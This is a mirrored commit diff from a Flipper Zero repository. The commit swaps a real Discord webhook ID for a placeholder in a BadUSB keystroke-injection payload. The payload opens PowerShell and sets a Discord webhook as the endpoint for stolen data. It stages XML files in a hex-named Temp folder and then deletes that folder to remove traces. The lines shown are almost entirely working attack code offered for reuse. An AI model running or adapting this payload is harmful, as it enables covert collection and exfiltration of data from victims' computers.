mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-21 22:10:12 +00:00
Replaced webhook on lin 15 with placeholder
This commit is contained in:
parent
5b7a46586c
commit
087c19f48a
@ -12,7 +12,7 @@ ALTSTRING powershell
|
||||
ENTER
|
||||
DELAY 2000
|
||||
REM Save the Discord Webhook Endpoint in an variable.
|
||||
ALTSTRING $webhookUri = 'https://discord.com/api/webhooks/1065739856799617054/<Your Key>'
|
||||
ALTSTRING $webhookUri = 'https://discord.com/api/webhooks/<your_webhook_info>'
|
||||
ENTER
|
||||
REM Creating a new folder in Temp with random name to store the xml files.
|
||||
ALTSTRING New-Item -Path $env:temp -Name "476F6F6420426F7921" -ItemType "directory"
|
||||
@ -55,4 +55,4 @@ ALTSTRING Remove-Item -Path "$env:tmp/476F6F6420426F7921" -Force -Recurse
|
||||
ENTER
|
||||
REM Exit powershell.
|
||||
ALTSTRING exit
|
||||
ENTER
|
||||
ENTER
|
||||
|
Loading…
Reference in New Issue
Block a user